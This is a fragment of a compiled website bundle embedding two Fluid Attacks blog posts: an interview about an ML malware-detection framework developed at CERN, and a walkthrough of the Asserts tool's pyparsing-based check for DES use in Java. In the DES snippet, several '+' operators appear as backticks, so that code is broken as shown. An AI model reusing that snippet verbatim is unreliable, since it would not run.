\",/*#__PURE__*/e(\"em\",{children:\"\u201Cdevice\u201D\"}),\" is undoubtedly a huge challenge. Andr\\xe9s has been featured in the prestigious magazine \",/*#__PURE__*/e(\"code\",{children:/*#__PURE__*/e(o,{href:\"https://www.scientificamerican.com/article/worlds-most-powerful-particle-collider-taps-ai-to-expose-hack-attacks/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Scientific American\"})})}),\". He told us that the \",/*#__PURE__*/e(\"code\",{children:\"CERN\"}),\", owner of the \",/*#__PURE__*/e(\"code\",{children:\"LHC\"}),\", is a constant target for cyber attacks and that this is not surprising: many \",/*#__PURE__*/e(\"code\",{children:\"CERN\"}),\" systems are exposed to the Internet. We wanted to know more about \",/*#__PURE__*/e(\"code\",{children:\"ML\"}),\" in his work\u2026\u200B\"]}),/*#__PURE__*/e(\"p\",{children:/*#__PURE__*/e(\"strong\",{children:\"Tell us a bit about how ML contributes to the framework you developed\"})}),/*#__PURE__*/t(\"p\",{children:[\"\u201CI used two \",/*#__PURE__*/e(\"code\",{children:\"ML\"}),\" models. The first performs a classification of applications into malicious and non-malicious. The other generates synthetic attacks to improve the training of the first. I used thousands of examples of typical applications as well as \",/*#__PURE__*/e(\"code\",{children:\"Linux\"}),\" malware for training and testing both models. My framework managed to identify malicious software with an accuracy of \",/*#__PURE__*/e(\"code\",{children:\"99%\"}),\" and less than \",/*#__PURE__*/e(\"code\",{children:\"0.06%\"}),\" of false positives.\u201D\"]}),/*#__PURE__*/t(\"p\",{children:[\"Impressive. We see a link to what we shared days ago on \",/*#__PURE__*/e(o,{href:\"https://fluidattacks.com/blog/seek-chaos/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"antifragility\"})}),\" and this cutting-edge work. By constant training and exposure to stressors, the framework makes itself better and better (just like lifting weights). According to \",/*#__PURE__*/e(o,{href:\"https://cybersecurityventures.com/cybersecurity-almanac-2019/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Cybersecurity Ventures\"})}),\", by 2021 it is estimated that cybersecurity damages will add up to \",/*#__PURE__*/e(\"code\",{children:\"USD\"}),\" 6 trillion in the world, \",/*#__PURE__*/e(\"code\",{children:\"3\"}),\" trillion more than in 2015. These \",/*#__PURE__*/e(\"code\",{children:\"ML\"}),\" designs, capable of detecting security weaknesses and responding are seen as an answer for the rampant threats nowadays. If you want to dig deeper into Andr\\xe9s' work, \",/*#__PURE__*/e(o,{href:\"https://arxiv.org/abs/1801.04179\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"here is a link\"})}),\" of a recent paper.\"]}),/*#__PURE__*/e(\"img\",{alt:\"Design architecture\",className:\"framer-image\",height:\"540\",src:\"https://framerusercontent.com/images/FOV4WUlv3oxYIvIODd3nI93Z0M.png\",srcSet:\"https://framerusercontent.com/images/FOV4WUlv3oxYIvIODd3nI93Z0M.png?scale-down-to=512 512w,https://framerusercontent.com/images/FOV4WUlv3oxYIvIODd3nI93Z0M.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/FOV4WUlv3oxYIvIODd3nI93Z0M.png 1920w\",style:{aspectRatio:\"1920 / 1080\"},width:\"960\"}),/*#__PURE__*/e(\"p\",{children:\"Gomez Ramirez, et. al. (2018) Proposed Arhuaco design architecture.\"}),/*#__PURE__*/e(\"p\",{children:\"Now, we turn to more general security-related issues with him.\"}),/*#__PURE__*/e(\"p\",{children:/*#__PURE__*/e(\"strong\",{children:\"In your opinion, what trends in cybersecurity we should pay more attention to?\"})}),/*#__PURE__*/e(\"p\",{children:\"\u201CI think of three relevant topics:\"}),/*#__PURE__*/t(\"p\",{children:[\"One is the use of Artificial Intelligence (\",/*#__PURE__*/e(\"code\",{children:\"AI\"}),\") for both attack detection as well as for vulnerability detection. I focused on the former in my doctoral research.\"]}),/*#__PURE__*/t(\"p\",{children:[\"Another is the implementation of cryptographic techniques to increase reliance in execution environments, so user privacy is improved. For example, by using something called \",/*#__PURE__*/e(\"em\",{children:/*#__PURE__*/e(\"strong\",{children:\"homomorphic encryption\"})}),\", an end-user could cipher his/her sensitive information before sharing it with a third-party (i.e., a company). The third-party can then perform operations over the encrypted data and finally, the user deciphers the results. No one (especially potential attackers) has access to plain, actionable data. Homomorphic encryption is used, for instance, in blockchain-based applications.\"]}),/*#__PURE__*/e(\"p\",{children:\"The last trend is the emergence of computer systems designed from formal mathematical models which, in theory, are vulnerability-proof.\u201D\"}),/*#__PURE__*/t(\"p\",{children:[\"An example of that vulnerability-proof software can be found \",/*#__PURE__*/e(o,{href:\"https://github.com/project-everest/hacl-star\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"here\"})}),\".\"]}),/*#__PURE__*/t(\"p\",{children:[\"As a company focused on proving security in an offensive way, \",/*#__PURE__*/e(\"code\",{children:\"AI\"}),\" is definitely a focus of research for us. Although we haven\u2019t yet got dirty developing \",/*#__PURE__*/e(\"code\",{children:\"ML\"}),\" or \",/*#__PURE__*/e(\"code\",{children:\"AI\"}),\" artifacts, is something very likely to happen soon.\"]}),/*#__PURE__*/e(\"p\",{children:/*#__PURE__*/e(\"strong\",{children:'What threats are worth \"having on the radar\"?'})}),/*#__PURE__*/t(\"p\",{children:[\"\u201CIn general, with the rise of \",/*#__PURE__*/e(\"code\",{children:\"AI\"}),\", I believe we will start to see more attacks that learn automatically from the environment where they are carried out. Attacks on \",/*#__PURE__*/e(\"em\",{children:'\"Internet of Things\"'}),\" (\",/*#__PURE__*/e(\"code\",{children:\"IoT\"}),\") devices have also wreaked havoc in recent months. Finally, the leakage of sensitive user data is becoming more problematic as time passes on.\u201D\"]}),/*#__PURE__*/t(\"p\",{children:[\"IoT weaknesses and leakage of sensitive information are well under our scope. We provide \",/*#__PURE__*/e(o,{href:\"https://fluidattacks.com/continuous-hacking/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Continuous Hacking\"})}),\". If you have IoT devices deployed on your premises, we can help you identifying attack vectors, as well as providing ways to increase their security. We can help you to protect better your sensitive information.\"]}),/*#__PURE__*/t(\"p\",{children:[\"Our services rely on highly-skilled security analysts as well as on technology designed to deliver real value to your company. But, we go further. \",/*#__PURE__*/e(o,{href:\"https://fluidattacks.com/contact-us\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Get in touch\"})}),\" so we can discuss how we can help you.\"]}),/*#__PURE__*/e(\"p\",{children:\"We continue our conversation with Andr\\xe9s.\"}),/*#__PURE__*/e(\"p\",{children:/*#__PURE__*/e(\"strong\",{children:\"What do you think is a persistent problem within organizations?\"})}),/*#__PURE__*/e(\"p\",{children:\"\u201CI would say there are still many companies receiving well-intended warnings from third parties concerning security holes in their systems. But, instead of taking a good skill in fixing the problems and thanking the contributions, what they do is threaten or sue the guy pointing to the risk.\u201D\"}),/*#__PURE__*/e(\"p\",{children:\"This is a sensitive topic and a critique. We know that some companies foster this kind of actions in what is called Big Bounty programs, with clear rules and rewards. These companies, presumably, have reached an understanding of the costs of a cybersecurity breach, so these programs are a win-win. Is it a matter of rules? Is it a matter of incentives? It is a topic worth discussing in more depth in the future.\"}),/*#__PURE__*/e(\"p\",{children:\"We want to conclude this post with two quick questions to Andr\\xe9s:\"}),/*#__PURE__*/e(\"p\",{children:/*#__PURE__*/e(\"strong\",{children:\"Where should companies focus their learning efforts to improve their risk management?\"})}),/*#__PURE__*/e(\"p\",{children:\"\u201COrganizations should adopt a data-driven strategy and invest in automation. They should also invest in research to stay relevant in a continuously changing field.\u201D\"}),/*#__PURE__*/e(\"p\",{children:/*#__PURE__*/e(\"strong\",{children:\"Do you expect any further development based on your doctoral thesis?\"})}),/*#__PURE__*/e(\"p\",{children:\"\u201CI am exploring to go further with the framework. The idea is to push what has been developed so far in a research stage into a commercial product that can be put to work in different organizations.\u201D\"}),/*#__PURE__*/t(\"p\",{children:[\"We hope you liked this post in which we shared some experiences and opinions with Andr\\xe9s. We would love to hear from you on these topics. Drops us a mail to \",/*#__PURE__*/e(o,{href:\"mailto:communications@fluidattacks.com\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"communications@fluidattacks.com\"})}),\" and engage with us!\"]}),/*#__PURE__*/e(\"p\",{children:\"Thank you, Andr\\xe9s!\"}),/*#__PURE__*/e(\"h2\",{children:\"Reference\"}),/*#__PURE__*/e(\"p\",{children:/*#__PURE__*/e(o,{href:\"https://arxiv.org/abs/1801.04179\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"Ramirez, A. G., Lara, C., Betev, L., Bilanovic, D. , & Kebschull, U. (2018).\"})})})]});export const richText14=/*#__PURE__*/t(a.Fragment,{children:[/*#__PURE__*/t(\"p\",{children:[\"As you might have noticed at Fluid Attacks we like \",/*#__PURE__*/e(o,{href:\"https://fluidattacks.com/blog/pars-orationis-secura/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"parser combinators\"})}),\", \",/*#__PURE__*/e(o,{href:\"https://fluidattacks.com/blog/why-we-go-functional/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"functional programming\"})}),\", and of course, Python. In the parser article, we showed you the essentials of \",/*#__PURE__*/e(\"code\",{children:\"Pyparsing\"}),\" and we also showed how to leverage its power to find \",/*#__PURE__*/e(\"code\",{children:\"SQL\"}),\" injections in a \",/*#__PURE__*/e(\"code\",{children:\"PHP\"}),\" application. Here we will extend those essentials to show you how we used parser combinators in Asserts, our vulnerability closure checker engine (considering that we not longer support this product). Feel free to refer to that article for more details on how \",/*#__PURE__*/e(\"code\",{children:\"Pyparsing\"}),\" works, though I\u2019ll try my best to explain every keyword used here.\"]}),/*#__PURE__*/t(\"p\",{children:[\"Parser combinators are particularly useful analyzing complex expressions. You don\u2019t really need parser combinators to break up email addresses into usernames and domains. For that, a regular expression will suffice. However, when what you need to do is more involved, such as looking for \",/*#__PURE__*/e(\"code\",{children:\"SQL\"}),\" injections or analyzing source code for poor programming practices per our \",/*#__PURE__*/e(o,{href:\"https://help.fluidattacks.com/portal/en/kb/criteria/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:/*#__PURE__*/e(\"strong\",{children:\"Criteria\"})})}),\" and recommendations, then parsers are our tool of choice. This is one of the tasks at which \",/*#__PURE__*/e(\"code\",{children:\"Asserts\"}),\" excels. Determine whether a vulnerability that has been found in the source code by one of our analysts is still open by doing a deep search within it with the aid of parser combinators. Let\u2019s see how that works.\"]}),/*#__PURE__*/t(\"p\",{children:[\"Suppose an analyst was auditing some \",/*#__PURE__*/e(\"code\",{children:\"Java\"}),\" source code and found out that it uses the insecure \",/*#__PURE__*/e(\"code\",{children:\"DES\"}),\" cipher to mask the information of a bank transaction in the file \",/*#__PURE__*/e(\"code\",{children:\"transactions.java\"}),\". \",/*#__PURE__*/e(\"code\",{children:\"DES\"}),\" is insecure due to its small 56-bit key size which could theoretically be brute-forced in 6 minutes. In order to report the vulnerability, they could write a script that automatically checks if the vulnerability is still there.\"]}),/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(\"strong\",{children:\"Asserts script \"}),/*#__PURE__*/e(\"code\",{children:/*#__PURE__*/e(\"strong\",{children:\"expl.py\"})}),/*#__PURE__*/e(\"strong\",{children:\" to check DES usage.\"})]}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(s,{...t,code:\"from fluidasserts.lang import java\\n\\nFILE = 'transactions.java'\\njava.uses_des_algorithm(FILE)\",language:\"Python\"})})}),/*#__PURE__*/t(\"p\",{children:[\"Simple, right? Just running that script tells you whether or not the insecure \",/*#__PURE__*/e(\"code\",{children:\"DES\"}),\" algorithm is used in that particular file. Or you can even point it at an entire directory and \",/*#__PURE__*/e(\"code\",{children:\"Asserts\"}),\" will test every \",/*#__PURE__*/e(\"code\",{children:\"Java\"}),\" source file for \",/*#__PURE__*/e(\"code\",{children:\"DES\"}),\" usage. But what\u2019s behind the curtain? Since \",/*#__PURE__*/e(\"code\",{children:\"Asserts\"}),\" is now open-source, anyone can actually check out what this function does.\"]}),/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(\"strong\",{children:\"java.py. See \"}),/*#__PURE__*/e(o,{href:\"https://gitlab.com/fluidattacks/asserts/blob/master/fluidasserts/lang/java.py#L395\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:/*#__PURE__*/e(\"strong\",{children:\"Gitlab\"})})}),/*#__PURE__*/e(\"strong\",{children:\" for rest of code.\"})]}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(s,{...t,code:\"from pyparsing import (CaselessKeyword, Word, Literal, Optional, alphas, Or,\\n alphanums, Suppress, nestedExpr, javaStyleComment,\\n SkipTo, QuotedString, oneOf)\\n\\nfrom fluidasserts.helper import lang\\n\\n...\\n\\ndef uses_des_algorithm(java_dest: str, exclude: list = None) -> bool:\\n    \\\"\\\"\\\"\\n    Check if code uses DES as encryption algorithm.\\n\\n    See `https://help.fluidattacks.com/portal/en/kb/articles/criteria-requirements-149`_.\\n\\n    :param java_dest: Path to a Java source file or package.\\n    \\\"\\\"\\\"\\n    method = 'Cipher.getInstance(\\\"DES\\\")'\\n    tk_mess_dig = CaselessKeyword('cipher')\\n    tk_get_inst = CaselessKeyword('getinstance')\\n    tk_alg = Literal('\\\"') ` CaselessKeyword('des') ` Literal('\\\"')\\n    tk_params = Literal('(') ` tk_alg ` Literal(')')\\n    instance_des = tk_mess_dig ` Literal('.') ` tk_get_inst + tk_params\\n\\n    result = False\\n    try:\\n        matches = lang.check_grammar(instance_des, java_dest, LANGUAGE_SPECS,\\n                                     exclude)\\n        if not matches:\\n            show_unknown('Not files matched',\\n                         details=dict(code_dest=java_dest))\\n            return False\\n    except FileNotFoundError:\\n        show_unknown('File does not exist', details=dict(code_dest=java_dest))\\n        return False\\n    for code_file, vulns in matches.items():\\n        if vulns:\\n            show_open('Code uses {} method'.format(method),\\n                      details=dict(file=code_file,\\n                                   fingerprint=lang.\\n                                   file_hash(code_file),\\n                                   lines=\\\", \\\".join([str(x) for x in vulns]),\\n                                   total_vulns=len(vulns)))\\n            result = True\\n        else:\\n            show_close('Code does not use {} method'.format(method),\\n                       details=dict(file=code_file,\\n                                    fingerprint=lang.\\n                                    file_hash(code_file)))\\n    return result\",language:\"Python\"})})}),/*#__PURE__*/t(\"p\",{children:[\"Notice how, in the first few lines (17-22)above, the parser \",/*#__PURE__*/e(\"code\",{children:\"instance_des\"}),\" is built from smaller parsers such as \",/*#__PURE__*/e(\"code\",{children:\"tk_mess_dig\"}),', which matches the single keyword \"Cipher\", but also any variations in case, should they happen. ',/*#__PURE__*/e(\"code\",{children:\"CaselessKeyword\"}),\". \",/*#__PURE__*/e(\"code\",{children:\"Literal\"}),\" does not make any such assumption: if its double quotes, they must be there. \",/*#__PURE__*/e(\"code\",{children:\"Pyparsing\"}),\" also takes care of handling white space by overloading the \",/*#__PURE__*/e(\"code\",{children:\"+\"}),' operator to mean \"followed possibly with some whitespace in between\". Building a regex to match the same thing would be perhaps more compact, but never as readable or maintainable. This is one of the many advantages of parser combinators over regular expressions.']}),/*#__PURE__*/t(\"p\",{children:[\"Next, this parser is passed along with the other required parameters to the function \",/*#__PURE__*/e(\"code\",{children:\"check_grammar\"}),\" in the \",/*#__PURE__*/e(\"code\",{children:\"lang\"}),\" module (more on that later). This function should return the matches in said file for the built parser. Thus the actual matching code can be reused. If there are matches, that means the vulnerability is open, hence \",/*#__PURE__*/e(\"code\",{children:\"Asserts\"}),\" will \",/*#__PURE__*/e(\"code\",{children:\"show_open\"}),\" a message like this:\"]}),/*#__PURE__*/e(\"img\",{alt:\"Asserts\",className:\"framer-image\",height:\"539\",src:\"https://framerusercontent.com/images/JyfzhfsT9IOtUjpDXDSMg319Js.png\",srcSet:\"https://framerusercontent.com/images/JyfzhfsT9IOtUjpDXDSMg319Js.png?scale-down-to=512 512w,https://framerusercontent.com/images/JyfzhfsT9IOtUjpDXDSMg319Js.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/JyfzhfsT9IOtUjpDXDSMg319Js.png 1919w\",style:{aspectRatio:\"1919 / 1079\"},width:\"959\"}),/*#__PURE__*/e(\"h6\",{children:\"Asserts open vulnerability message.\"}),/*#__PURE__*/e(\"p\",{children:\"Otherwise it shows a similar message, only with fewer alarming colors.\"}),/*#__PURE__*/t(\"p\",{children:[\"So, what does the \",/*#__PURE__*/e(\"code\",{children:\"lang\"}),\" module do with the combined parsers and the file? More parsing. It tests whether the path is a single file or a directory whether or not it has the correct extension, but really all the most important stuff is in the \",/*#__PURE__*/e(\"code\",{children:\"get_match_lines\"}),\" method. It parses the text in the given source code file to find out if those lines are comments, i.e., not functional code, so as to skip them. In the future, \",/*#__PURE__*/e(\"code\",{children:\"Asserts\"}),\" will be able to use this comment-code discrimination to find lines of code which were commented out and later abandoned. This would be important because these commented-out lines of code might exhibit unpredictable behavior in the application if they were carelessly uncommented, depending on who has access to the code.\"]}),/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(\"strong\",{children:\"From \"}),/*#__PURE__*/e(\"code\",{children:/*#__PURE__*/e(\"strong\",{children:\"fluidasserts.helper.lang\"})}),/*#__PURE__*/e(\"strong\",{children:\" module. See full code in \"}),/*#__PURE__*/e(o,{href:\"https://gitlab.com/fluidattacks/asserts/blob/master/fluidasserts/helper/lang.py\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:/*#__PURE__*/e(\"strong\",{children:\"Gitlab\"})})}),/*#__PURE__*/e(\"strong\",{children:\".\"})]}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(s,{...t,code:\"def _get_match_lines(grammar: ParserElement, code_file: str, # noqa\\n lang_spec: dict) -> List:  # noqa\\n    \\\"\\\"\\\"\\n    Check grammar in file.\\n\\n    :param grammar: Pyparsing grammar against which file will be checked.\\n    :param code_file: Source code file to check.\\n    :param lang_spec: Contains language-specific syntax elements, such as\\n                       acceptable file extensions and comment delimiters.\\n    :return: List of lines that contain grammar matches.\\n    \\\"\\\"\\\"\\n    with open(code_file, encoding='latin-1') as file_fd:\\n        affected_lines = []\\n        counter = 0\\n        in_block_comment = False\\n        for line in file_fd.readlines():\\n            counter += 1\\n            try:\\n                if lang_spec.get('line_comment'):\\n                    parser = ~Or(lang_spec.get('line_comment'))\\n                    parser.parseString(line)\\n            except ParseException:\\n                continue\\n            if lang_spec.get('block_comment_start'):\\n                try:\\n                    block_start = Literal(lang_spec.get('block_comment_start'))\\n                    parser = SkipTo(block_start) + block_start\\n                    parser.parseString(line)\\n                    in_block_comment = True\\n                except (ParseException, IndexError):\\n                    pass\\n\\n                if in_block_comment and lang_spec.get('block_comment_end'):\\n                    try:\\n                        block_end = Literal(lang_spec.get('block_comment_end'))\\n                        parser = SkipTo(block_end) + block_end\\n                        parser.parseString(line)\\n                        in_block_comment = False\\n                        continue\\n                    except ParseException:\\n                        continue\\n                    except IndexError:\\n                        pass\\n            try:\\n                results = grammar.searchString(line, maxMatches=1)\\n                if not _is_empty_result(results):\\n                    affected_lines.append(counter)\\n            except ParseException:\\n                pass\\n    return affected_lines\",language:\"Python\"})})}),/*#__PURE__*/t(\"p\",{children:[\"After testing if the code we\u2019re looking at is functional or not, it is simply a matter of invoking the \",/*#__PURE__*/e(\"code\",{children:\"searchString\"}),\" method from \",/*#__PURE__*/e(\"code\",{children:\"PyParsing\"}),\", which as its name implies, searches the given string for matches of the given parser. The module has a few more tricks up its sleeve, such as turning the parsing search results into pretty strings and parsing chunks of lines of code. All that again with the help of parser combinators.\"]}),/*#__PURE__*/t(\"p\",{children:[\"The most important takeaway from looking at this single function\u2019s source code, and what lies behind it, is that using parser combinators in \",/*#__PURE__*/e(\"code\",{children:\"Asserts\"}),\" allows us not only to have readable, maintainable code for our own use and the use of others but also for this code to be easily \",/*#__PURE__*/e(\"em\",{children:\"extensible\"}),\" and \",/*#__PURE__*/e(\"em\",{children:\"reusable\"}),\". Due to its object-oriented interface, clear naming conventions, and that coding parsers in it are just \",/*#__PURE__*/e(\"em\",{children:\"pythonic\"}),\", \",/*#__PURE__*/e(\"code\",{children:\"PyParsing\"}),\" allows our team to write and rewrite static code analysis tools that will change along with its users' needs.\"]}),/*#__PURE__*/t(\"p\",{children:[\"That wouldn\u2019t be possible with regular expressions. Regexes must be tailor-made, carefully designed with one specific objective in mind. One application. So that regex that might search for conditionals without default actions in \",/*#__PURE__*/e(\"code\",{children:\"Javascript\"}),\", will be useless for the same purpose in a different language. Such is not the case with parser combinators as most code is easily modified or reusable. Also, nesting searches as we did above (parsing before parsing to know if we\u2019re inside a block comment) will definitely require uber-complex regular expressions, if it is possible at all.\"]}),/*#__PURE__*/t(\"p\",{children:[\"Just like \",/*#__PURE__*/e(\"code\",{children:\"uses_des_algorithm\"}),\" above, \",/*#__PURE__*/e(\"code\",{children:\"Asserts\"}),\" packs convenient functions to test for many of our requirements or recommendations for \",/*#__PURE__*/e(o,{href:\"https://fluidattacks.com/products/secure-code-review\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(i.a,{children:\"secure coding\"})}),\", for several different languages, and growing daily. \",/*#__PURE__*/e(\"code\",{children:\"Pyparsing\"}),\" enhances a significant part of our static code analysis tools in a way that, as mentioned earlier, with regexes would only be \",/*#__PURE__*/e(\"em\",{children:\"ad hoc\"}),\" or impossible to maintain.\"]}),/*#__PURE__*/e(\"p\",{children:/*#__PURE__*/e(\"br\",{className:\"trailing-break\"})})]});\nexport const __FramerMetadata__ = {\"exports\":{\"richText10\":{\"type\":\"variable\",\"annotations\":{\"framerContractVersion\":\"1\"}},\"richText14\":{\"type\":\"variable\",\"annotations\":{\"framerContractVersion\":\"1\"}},\"richText3\":{\"type\":\"variable\",\"annotations\":{\"framerContractVersion\":\"1\"}},\"richText6\":{\"type\":\"variable\",\"annotations\":{\"framerContractVersion\":\"1\"}},\"richText5\":{\"type\":\"variable\",\"annotations\":{\"framerContractVersion\":\"1\"}},\"richText12\":{\"type\":\"variable\",\"annotations\":{\"framerContractVersion\":\"1\"}},\"richText1\":{\"type\":\"variable\",\"annotations\":{\"framerContractVersion\":\"1\"}},\"richText8\":{\"type\":\"variable\",\"annotations\":{\"framerContractVersion\":\"1\"}},\"richText7\":{\"type\":\"variable\",\"annotations\":{\"framerContractVersion\":\"1\"}},\"richText2\":{\"type\":\"variable\",\"annotations\":{\"framerContractVersion\":\"1\"}},\"richText\":{\"type\":\"variable\",\"annotations\":{\"framerContractVersion\":\"1\"}},\"richText13\":{\"type\":\"variable\",\"annotations\":{\"framerContractVersion\":\"1\"}},\"richText9\":{\"type\":\"variable\",\"annotations\":{\"framerContractVersion\":\"1\"}},\"richText4\":{\"type\":\"variable\",\"annotations\":{\"framerContractVersion\":\"1\"}},\"richText11\":{\"type\":\"variable\",\"annotations\":{\"framerContractVersion\":\"1\"}},\"__FramerMetadata__\":{\"type\":\"variable\"}}}"],
  "mappings": "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